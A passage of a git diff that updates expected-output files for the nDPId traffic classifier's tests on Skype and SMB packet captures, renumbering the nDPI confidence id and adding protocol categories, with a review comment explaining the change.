+00583{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","packets-captured":2146,"packets-processed":2079,"total-skipped-flows":0,"total-l4-payload-len":359672,"total-not-detected-flows":45,"total-guessed-flows":22,"total-detected-flows":200,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":267,"total-idle-flows":267,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1296,"global_ts_msec":1431970708726} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2146/2079 ~~ skipped flows.............: 0 @@ -1299,9 +1302,9 @@ ~~ total active/idle flows...: 267/267 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6440928 bytes -~~ total memory freed........: 6440928 bytes -~~ total allocations/frees...: 121365/121365 +~~ total memory allocated....: 6506571 bytes +~~ total memory freed........: 6506571 bytes +~~ total allocations/frees...: 124102/124102 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 197 chars ~~ json string max len.......: 1776 chars diff --git a/test/results/skype_udp.pcap.out b/test/results/skype_udp.pcap.out index a7f55f9ef..c2e92dbd6 100644 --- a/test/results/skype_udp.pcap.out +++ b/test/results/skype_udp.pcap.out 
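Review bot: The numeric key inside `"confidence"` moves from `"4":"DPI"` to `"6":"DPI"` on every idle event re-added in this hunk, and the commit description does not mention that the emitted JSON changed. The `skype_udp.pcap.out` hunks that follow show the same renumbering and also gain `"category":"VoIP"` on `Skype_Teams` events. Presumably the bumped libnDPI added confidence levels ahead of DPI; any downstream parser, detection rule or dashboard that filters on the numeric key would then silently stop matching, or match a different confidence level. I would add a line to the description such as `nDPI confidence ids renumbered (DPI: 4 -> 6); consumers should match on the confidence name, not the id`.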
@@ -3,9 +3,9 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1156534494734,"flow_last_seen":1156534494734,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1156534494734,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1156534494734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1156534494734,"pkt":"ABbjGScVAAR2lnvaCABFAAA7AABAAEARoZLAqAECGOC+lYyWmV4AJ5lYFpcCrtEAh3kuASsbNLlPtKfPLsSj70vZ59IfZD23vQ=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1156534496782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1156534496782,"pkt":"ABbjGScVAAR2lnvaCABFAAA7AABAAEARoZLAqAECGOC+lYyWmV4AJ5lYFpcCqvCj5HkuAStybQoRs8uOXAH\/9ayvdzDWsfxVrg=="} 
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1156534494734,"flow_last_seen":1156534496782,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1156534496782,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams","breed":"Acceptable"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1156534494734,"flow_last_seen":1156534496782,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1156534496782,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1156534500825,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1156534500825,"pkt":"ABbjGScVAAR2lnvaCABFAAA7AABAAEARoZLAqAECGOC+lYyWmV4AJ5lYFpcCvuoUBXkuASuSYOIkRaPfGbxEfOnC\/51D4o9Ncw=="} 
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1156534494734,"flow_last_seen":1156534567244,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1156534567244,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams","breed":"Acceptable"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1156534494734,"flow_last_seen":1156534567244,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1156534567244,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"skype_udp.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":129,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1156534567244} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 5/5 @@ -15,10 +15,10 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869588 bytes -~~ total memory freed........: 5869588 bytes -~~ total allocations/frees...: 118119/118119 +~~ total memory allocated....: 6003222 bytes +~~ total memory freed........: 6003222 bytes +~~ total allocations/frees...: 120881/120881 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars -~~ json string max len.......: 672 chars -~~ json string avg len.......: 560 chars +~~ json string max len.......: 690 chars +~~ json string avg len.......: 568 chars diff --git a/test/results/smb_deletefile.pcap.out b/test/results/smb_deletefile.pcap.out index f7adcd0f7..fac40c1c4 100644 --- a/test/results/smb_deletefile.pcap.out +++ b/test/results/smb_deletefile.pcap.out 
@@ -2,10 +2,10 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1584368315417} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7580000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01014{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1584368315417,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":434,"pkt_l4_len":400,"thread_ts_msec":1584368315417,"pkt":"2MuK4S0uKDc3AG3ICABFAAGkAABAAEAGtNLAqAF2wKgBu94QAb3ooAVq8kMyI1AYqgDfmAAAAAABeP5TTUJAAAEAAAAAAAUAAAEAAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAA5AAAAAgAAAAAAAAAAAAAAAAAAAAAAAACBABAAEAAAAAcAAAABAAAAAQAAAHgAHAAAAAAAAAAAAEwAdQBjAGEAXABEAG8AdwBuAGwAbwBhAGQAcwAAAAAA\/lNNQkAAAQAAAAAADgAAAQQAAACIAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAACEAJQMAAAAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2AAJgAAAAEAaQBuAG4AbwBzAGUAdAB1AHAALQA1AC4ANgAuADEALgBlAHgAZQAAAP5TTUJAAAEAAAAAAAYAAAEEAAAAAAAAAJ4PAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7580000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7580000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1584368315418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":1584368315418,"pkt":"KDc3AG3I2MuK4S0uCABFAAIcOK5AAIAGO6zAqAG7wKgBdgG93hDyQzIj6KAG5lAYEAjw+QAAAAAB8P5TTUJAAAEAAAAAAAUAAAABAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAABZAAAAAQAAAPJad+s0itQBeC8Pcpz71QGM0O1xnPvVAYzQ7XGc+9UBACAAAAAAAAAAIAAAAAAAABEAAAAAAAAAEgQAAAoAAABlAAAACgAAAAAAAAAAAAAA\/lNNQkAAAQAAAAAADgAAAAUAAADYAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAkASACOAAAAAAAAAAAAAAAzwlM5LZjUATN2tkyb+9UBqrZQPC2Y1AHHrtHNIlnVAYD0HQAAAAAAAAAeAAAAAAAgAAAAJgAAAAAAAAAYAEkATgBOAE8AUwBFAH4AMQAuAEUAWABFAAAAq04CAAAAAQBpAG4AbgBvAHMAZQB0AHUAcAAtADUALgA2AC4AMQAuAGUAeABlAAAA\/lNNQkAAAQAAAAAABgADAAUAAAAAAAAAng8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1584368315418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1584368315418,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGtk7AqAF2wKgBu94QAb3ooAbm8kM0F1AQqfyLpgAA"} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1584368315417,"flow_last_seen":1584368317802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":25252,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1584368317802,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1584368315417,"flow_last_seen":1584368317802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":25252,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1584368317802,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} 
00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","packets-captured":101,"packets-processed":101,"total-skipped-flows":0,"total-l4-payload-len":25252,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1584368317802} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 101/101 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872372 bytes -~~ total memory freed........: 5872372 bytes -~~ total allocations/frees...: 118215/118215 +~~ total memory allocated....: 6006006 bytes +~~ total memory freed........: 6006006 bytes +~~ total allocations/frees...: 120977/120977 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 1139 chars diff --git a/test/results/smb_frags.pcap.out b/test/results/smb_frags.pcap.out new file mode 100644 index 000000000..cd27de70b --- /dev/null +++ b/test/results/smb_frags.pcap.out 
@@ -0,0 +1,24 @@ +00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smb_frags.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smb_frags.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1623514369772} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623514369772,"flow_last_seen":1623514369772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623514369772,"l3_proto":"ip4","src_ip":"10.202.211.125","dst_ip":"10.202.7.8","src_port":54120,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623514369772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1623514369772,"pkt":"AAAAAAAAAAgAAAAIgQAGSAgARQAAPJdVQAA+BrVNCsrTfQrKBwjTaAG9gKLxEgAAAACgAv\/\/GS4AAAIEIwABAwMGBAIICs5HDEsAAAAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623514369868,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1623514369868,"pkt":"AAAAAAAAAAgAAAAIgQAGSAgARQAAPE51QAB8BsAtCsoHCArK030BvdNoZ4rlhYCi8ROgEiAAlmYAAAIEBWQBAwMIBAIICowopxfORwxL"} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623514369870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":121,"pkt_l4_len":83,"thread_ts_msec":1623514369870,"pkt":"AAAAAAAAAAgAAAAIgQAGSAgARQAAZ5dXQAA+BrUgCsrTfQrKBwjTaAG9gKLxE2eK5YaAGAgZ+EgAAAEBCArORwytjCinFwAAAC\/\/U01CcgAAAAAYBdgAAAAAAAAAAAAAAAD\/\/wEA\/\/8BAAAMAAJOVCBMTSAwLjEyAA=="} 
+00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623514369772,"flow_last_seen":1623514370258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1623514370258,"l3_proto":"ip4","src_ip":"10.202.211.125","dst_ip":"10.202.7.8","src_port":54120,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +01031{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8,"source":"smb_frags.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1623514369772,"flow_last_seen":1623514370351,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":2187,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1623514370351,"l3_proto":"ip4","src_ip":"10.202.211.125","dst_ip":"10.202.7.8","src_port":54120,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8,"source":"smb_frags.pcap","alias":"nDPId-test","packets-captured":8,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":2187,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1623514370351} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 8/8 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 2187 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6005390 bytes +~~ total memory freed........: 6005390 bytes +~~ total allocations/frees...: 120887/120887 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 465 chars +~~ json string max len.......: 1036 chars +~~ json string avg len.......: 718 chars diff --git a/test/results/smbv1.pcap.out b/test/results/smbv1.pcap.out index d1fdaad67..4144d0a60 100644 --- a/test/results/smbv1.pcap.out +++ b/test/results/smbv1.pcap.out 
@@ -4,8 +4,8 @@ 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492191036092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1492191036092,"pkt":"AFBW6AqxAAwpAu9qCABFAACxF9IAAIAGzm+sEJyCCoAA88bvAb3S22hjm3waG1AY+vCemgAAAAAAhf9TTUJyAAAAABhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAAGIAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAkxBTk1BTjEuMAACV2luZG93cyBmb3IgV29ya2dyb3VwcyAzLjFhAAJMTTEuMlgwMDIAAkxBTk1BTjIuMQACTlQgTE0gMC4xMgA="} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492191036120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1492191036120,"pkt":"AAwpAu9qAFBW6AqxCABFAACdcSEAAIAGdTQKgADzrBCcggG9xu+bfBob0tto7FAY+vCpnwAAAAAAcf9TTUJyAAAAAJhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAEQUAAzIAAQAEEQAAAAABAAAAAAD84wEAQPSc00S10gHwAAgsAAirHC\/h7OapVwBPAFIASwBHAFIATwBVAFAAAABKAE8ASABOAC0AUABDAAAA"} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492191036120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1492191036120,"pkt":"AFBW6AqxAAwpAu9qCABFAAC0F9MAAIAGzmusEJyCCoAA88bvAb3S22jsm3wakFAY+ns\/iQAAAAAAiP9TTUJzAAAAABgHwAAAAAAAAAAAAAAAAAAA\/\/4AAEAADf8AiAAEEQoAAAAAAAAAAQAAAAAAAADUAAAASwAAAAAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAAMgAxADkANQAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAANQAuADAAAAA="} 
-00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492191036092,"flow_last_seen":1492191036120,"flow_idle_time":7580000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":131,"midstream":1,"thread_ts_msec":1492191036120,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 